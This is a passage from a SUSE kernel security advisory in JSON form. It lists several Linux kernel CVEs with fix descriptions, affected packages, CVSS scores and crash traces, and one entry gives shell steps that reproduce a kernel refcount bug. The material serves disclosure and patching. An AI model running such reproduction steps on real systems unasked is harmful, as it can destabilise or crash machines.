"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40250"
},
{
"cve": "CVE-2025-40251",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40251"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndevlink: rate: Unset parent pointer in devl_rate_nodes_destroy\n\nThe function devl_rate_nodes_destroy is documented to \"Unset parent for\nall rate objects\". However, it was only calling the driver-specific\n`rate_leaf_parent_set` or `rate_node_parent_set` ops and decrementing\nthe parent\u0027s refcount, without actually setting the\n`devlink_rate-\u003eparent` pointer to NULL.\n\nThis leaves a dangling pointer in the `devlink_rate` struct, which cause\nrefcount error in netdevsim[1] and mlx5[2]. In addition, this is\ninconsistent with the behavior of `devlink_nl_rate_parent_node_set`,\nwhere the parent pointer is correctly cleared.\n\nThis patch fixes the issue by explicitly setting `devlink_rate-\u003eparent`\nto NULL after notifying the driver, thus fulfilling the function\u0027s\ndocumented behavior for all rate objects.\n\n[1]\nrepro steps:\necho 1 \u003e /sys/bus/netdevsim/new_device\ndevlink dev eswitch set netdevsim/netdevsim1 mode switchdev\necho 1 \u003e /sys/bus/netdevsim/devices/netdevsim1/sriov_numvfs\ndevlink port function rate add netdevsim/netdevsim1/test_node\ndevlink port function rate set netdevsim/netdevsim1/128 parent test_node\necho 1 \u003e /sys/bus/netdevsim/del_device\n\ndmesg:\nrefcount_t: decrement hit 0; leaking memory.\nWARNING: CPU: 8 PID: 1530 at lib/refcount.c:31 refcount_warn_saturate+0x42/0xe0\nCPU: 8 UID: 0 PID: 1530 Comm: bash Not tainted 6.18.0-rc4+ #1 NONE\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\nRIP: 0010:refcount_warn_saturate+0x42/0xe0\nCall Trace:\n \u003cTASK\u003e\n devl_rate_leaf_destroy+0x8d/0x90\n __nsim_dev_port_del+0x6c/0x70 [netdevsim]\n nsim_dev_reload_destroy+0x11c/0x140 [netdevsim]\n nsim_drv_remove+0x2b/0xb0 [netdevsim]\n device_release_driver_internal+0x194/0x1f0\n bus_remove_device+0xc6/0x130\n device_del+0x159/0x3c0\n device_unregister+0x1a/0x60\n del_device_store+0x111/0x170 [netdevsim]\n kernfs_fop_write_iter+0x12e/0x1e0\n vfs_write+0x215/0x3d0\n ksys_write+0x5f/0xd0\n do_syscall_64+0x55/0x10f0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n\n[2]\ndevlink dev eswitch set pci/0000:08:00.0 mode switchdev\ndevlink port add pci/0000:08:00.0 flavour pcisf pfnum 0 sfnum 1000\ndevlink port function rate add pci/0000:08:00.0/group1\ndevlink port function rate set pci/0000:08:00.0/32768 parent group1\nmodprobe -r mlx5_ib mlx5_fwctl mlx5_core\n\ndmesg:\nrefcount_t: decrement hit 0; leaking memory.\nWARNING: CPU: 7 PID: 16151 at lib/refcount.c:31 refcount_warn_saturate+0x42/0xe0\nCPU: 7 UID: 0 PID: 16151 Comm: bash Not tainted 6.17.0-rc7_for_upstream_min_debug_2025_10_02_12_44 #1 NONE\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014\nRIP: 0010:refcount_warn_saturate+0x42/0xe0\nCall Trace:\n \u003cTASK\u003e\n devl_rate_leaf_destroy+0x8d/0x90\n mlx5_esw_offloads_devlink_port_unregister+0x33/0x60 [mlx5_core]\n mlx5_esw_offloads_unload_rep+0x3f/0x50 [mlx5_core]\n mlx5_eswitch_unload_sf_vport+0x40/0x90 [mlx5_core]\n mlx5_sf_esw_event+0xc4/0x120 [mlx5_core]\n notifier_call_chain+0x33/0xa0\n blocking_notifier_call_chain+0x3b/0x50\n mlx5_eswitch_disable_locked+0x50/0x110 [mlx5_core]\n mlx5_eswitch_disable+0x63/0x90 [mlx5_core]\n mlx5_unload+0x1d/0x170 [mlx5_core]\n mlx5_uninit_one+0xa2/0x130 [mlx5_core]\n remove_one+0x78/0xd0 [mlx5_core]\n pci_device_remove+0x39/0xa0\n device_release_driver_internal+0x194/0x1f0\n unbind_store+0x99/0xa0\n kernfs_fop_write_iter+0x12e/0x1e0\n vfs_write+0x215/0x3d0\n ksys_write+0x5f/0xd0\n do_syscall_64+0x53/0x1f0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40251",
"url": "https://www.suse.com/security/cve/CVE-2025-40251"
},
{
"category": "external",
"summary": "SUSE Bug 1254856 for CVE-2025-40251",
"url": "https://bugzilla.suse.com/1254856"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40251"
},
{
"cve": "CVE-2025-40252",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40252"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: qlogic/qede: fix potential out-of-bounds read in qede_tpa_cont() and qede_tpa_end()\n\nThe loops in \u0027qede_tpa_cont()\u0027 and \u0027qede_tpa_end()\u0027, iterate\nover \u0027cqe-\u003elen_list[]\u0027 using only a zero-length terminator as\nthe stopping condition. If the terminator was missing or\nmalformed, the loop could run past the end of the fixed-size array.\n\nAdd an explicit bound check using ARRAY_SIZE() in both loops to prevent\na potential out-of-bounds access.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40252",
"url": "https://www.suse.com/security/cve/CVE-2025-40252"
},
{
"category": "external",
"summary": "SUSE Bug 1254849 for CVE-2025-40252",
"url": "https://bugzilla.suse.com/1254849"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40252"
},
{
"cve": "CVE-2025-40254",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40254"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: openvswitch: remove never-working support for setting nsh fields\n\nThe validation of the set(nsh(...)) action is completely wrong.\nIt runs through the nsh_key_put_from_nlattr() function that is the\nsame function that validates NSH keys for the flow match and the\npush_nsh() action. However, the set(nsh(...)) has a very different\nmemory layout. Nested attributes in there are doubled in size in\ncase of the masked set(). That makes proper validation impossible.\n\nThere is also confusion in the code between the \u0027masked\u0027 flag, that\nsays that the nested attributes are doubled in size containing both\nthe value and the mask, and the \u0027is_mask\u0027 that says that the value\nwe\u0027re parsing is the mask. This is causing kernel crash on trying to\nwrite into mask part of the match with SW_FLOW_KEY_PUT() during\nvalidation, while validate_nsh() doesn\u0027t allocate any memory for it:\n\n BUG: kernel NULL pointer dereference, address: 0000000000000018\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 1c2383067 P4D 1c2383067 PUD 20b703067 PMD 0\n Oops: Oops: 0000 [#1] SMP NOPTI\n CPU: 8 UID: 0 Kdump: loaded Not tainted 6.17.0-rc4+ #107 PREEMPT(voluntary)\n RIP: 0010:nsh_key_put_from_nlattr+0x19d/0x610 [openvswitch]\n Call Trace:\n \u003cTASK\u003e\n validate_nsh+0x60/0x90 [openvswitch]\n validate_set.constprop.0+0x270/0x3c0 [openvswitch]\n __ovs_nla_copy_actions+0x477/0x860 [openvswitch]\n ovs_nla_copy_actions+0x8d/0x100 [openvswitch]\n ovs_packet_cmd_execute+0x1cc/0x310 [openvswitch]\n genl_family_rcv_msg_doit+0xdb/0x130\n genl_family_rcv_msg+0x14b/0x220\n genl_rcv_msg+0x47/0xa0\n netlink_rcv_skb+0x53/0x100\n genl_rcv+0x24/0x40\n netlink_unicast+0x280/0x3b0\n netlink_sendmsg+0x1f7/0x430\n ____sys_sendmsg+0x36b/0x3a0\n ___sys_sendmsg+0x87/0xd0\n __sys_sendmsg+0x6d/0xd0\n do_syscall_64+0x7b/0x2c0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nThe third issue with this process is that while trying to convert\nthe non-masked set into masked one, validate_set() copies and doubles\nthe size of the OVS_KEY_ATTR_NSH as if it didn\u0027t have any nested\nattributes. It should be copying each nested attribute and doubling\nthem in size independently. And the process must be properly reversed\nduring the conversion back from masked to a non-masked variant during\nthe flow dump.\n\nIn the end, the only two outcomes of trying to use this action are\neither validation failure or a kernel crash. And if somehow someone\nmanages to install a flow with such an action, it will most definitely\nnot do what it is supposed to, since all the keys and the masks are\nmixed up.\n\nFixing all the issues is a complex task as it requires re-writing\nmost of the validation code.\n\nGiven that and the fact that this functionality never worked since\nintroduction, let\u0027s just remove it altogether. It\u0027s better to\nre-introduce it later with a proper implementation instead of trying\nto fix it in stable releases.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40254",
"url": "https://www.suse.com/security/cve/CVE-2025-40254"
},
{
"category": "external",
"summary": "SUSE Bug 1254852 for CVE-2025-40254",
"url": "https://bugzilla.suse.com/1254852"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40254"
},
{
"cve": "CVE-2025-40256",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40256"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfrm: also call xfrm_state_delete_tunnel at destroy time for states that were never added\n\nIn commit b441cf3f8c4b (\"xfrm: delete x-\u003etunnel as we delete x\"), I\nmissed the case where state creation fails between full\ninitialization (-\u003einit_state has been called) and being inserted on\nthe lists.\n\nIn this situation, -\u003einit_state has been called, so for IPcomp\ntunnels, the fallback tunnel has been created and added onto the\nlists, but the user state never gets added, because we fail before\nthat. The user state doesn\u0027t go through __xfrm_state_delete, so we\ndon\u0027t call xfrm_state_delete_tunnel for those states, and we end up\nleaking the FB tunnel.\n\nThere are several codepaths affected by this: the add/update paths, in\nboth net/key and xfrm, and the migrate code (xfrm_migrate,\nxfrm_state_migrate). A \"proper\" rollback of the init_state work would\nprobably be doable in the add/update code, but for migrate it gets\nmore complicated as multiple states may be involved.\n\nAt some point, the new (not-inserted) state will be destroyed, so call\nxfrm_state_delete_tunnel during xfrm_state_gc_destroy. Most states\nwill have their fallback tunnel cleaned up during __xfrm_state_delete,\nwhich solves the issue that b441cf3f8c4b (and other patches before it)\naimed at. All states (including FB tunnels) will be removed from the\nlists once xfrm_state_fini has called flush_work(\u0026xfrm_state_gc_work).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40256",
"url": "https://www.suse.com/security/cve/CVE-2025-40256"
},
{
"category": "external",
"summary": "SUSE Bug 1254851 for CVE-2025-40256",
"url": "https://bugzilla.suse.com/1254851"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40256"
},
{
"cve": "CVE-2025-40257",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40257"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix a race in mptcp_pm_del_add_timer()\n\nmptcp_pm_del_add_timer() can call sk_stop_timer_sync(sk, \u0026entry-\u003eadd_timer)\nwhile another might have free entry already, as reported by syzbot.\n\nAdd RCU protection to fix this issue.\n\nAlso change confusing add_timer variable with stop_timer boolean.\n\nsyzbot report:\n\nBUG: KASAN: slab-use-after-free in __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\nRead of size 4 at addr ffff8880311e4150 by task kworker/1:1/44\n\nCPU: 1 UID: 0 PID: 44 Comm: kworker/1:1 Not tainted syzkaller #0 PREEMPT_{RT,(full)}\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025\nWorkqueue: events mptcp_worker\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\n sk_stop_timer_sync+0x1b/0x90 net/core/sock.c:3631\n mptcp_pm_del_add_timer+0x283/0x310 net/mptcp/pm.c:362\n mptcp_incoming_options+0x1357/0x1f60 net/mptcp/options.c:1174\n tcp_data_queue+0xca/0x6450 net/ipv4/tcp_input.c:5361\n tcp_rcv_established+0x1335/0x2670 net/ipv4/tcp_input.c:6441\n tcp_v4_do_rcv+0x98b/0xbf0 net/ipv4/tcp_ipv4.c:1931\n tcp_v4_rcv+0x252a/0x2dc0 net/ipv4/tcp_ipv4.c:2374\n ip_protocol_deliver_rcu+0x221/0x440 net/ipv4/ip_input.c:205\n ip_local_deliver_finish+0x3bb/0x6f0 net/ipv4/ip_input.c:239\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n __netif_receive_skb_one_core net/core/dev.c:6079 [inline]\n __netif_receive_skb+0x143/0x380 net/core/dev.c:6192\n process_backlog+0x31e/0x900 net/core/dev.c:6544\n __napi_poll+0xb6/0x540 net/core/dev.c:7594\n napi_poll net/core/dev.c:7657 [inline]\n net_rx_action+0x5f7/0xda0 net/core/dev.c:7784\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n __local_bh_enable_ip+0x1a0/0x2e0 kernel/softirq.c:302\n mptcp_pm_send_ack net/mptcp/pm.c:210 [inline]\n mptcp_pm_addr_send_ack+0x41f/0x500 net/mptcp/pm.c:-1\n mptcp_pm_worker+0x174/0x320 net/mptcp/pm.c:1002\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nAllocated by task 44:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n poison_kmalloc_redzone mm/kasan/common.c:400 [inline]\n __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:417\n kasan_kmalloc include/linux/kasan.h:262 [inline]\n __kmalloc_cache_noprof+0x1ef/0x6c0 mm/slub.c:5748\n kmalloc_noprof include/linux/slab.h:957 [inline]\n mptcp_pm_alloc_anno_list+0x104/0x460 net/mptcp/pm.c:385\n mptcp_pm_create_subflow_or_signal_addr+0xf9d/0x1360 net/mptcp/pm_kernel.c:355\n mptcp_pm_nl_fully_established net/mptcp/pm_kernel.c:409 [inline]\n __mptcp_pm_kernel_worker+0x417/0x1ef0 net/mptcp/pm_kernel.c:1529\n mptcp_pm_worker+0x1ee/0x320 net/mptcp/pm.c:1008\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n\nFreed by task 6630:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n __kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:587\n kasan_save_free_info mm/kasan/kasan.h:406 [inline]\n poison_slab_object m\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40257",
"url": "https://www.suse.com/security/cve/CVE-2025-40257"
},
{
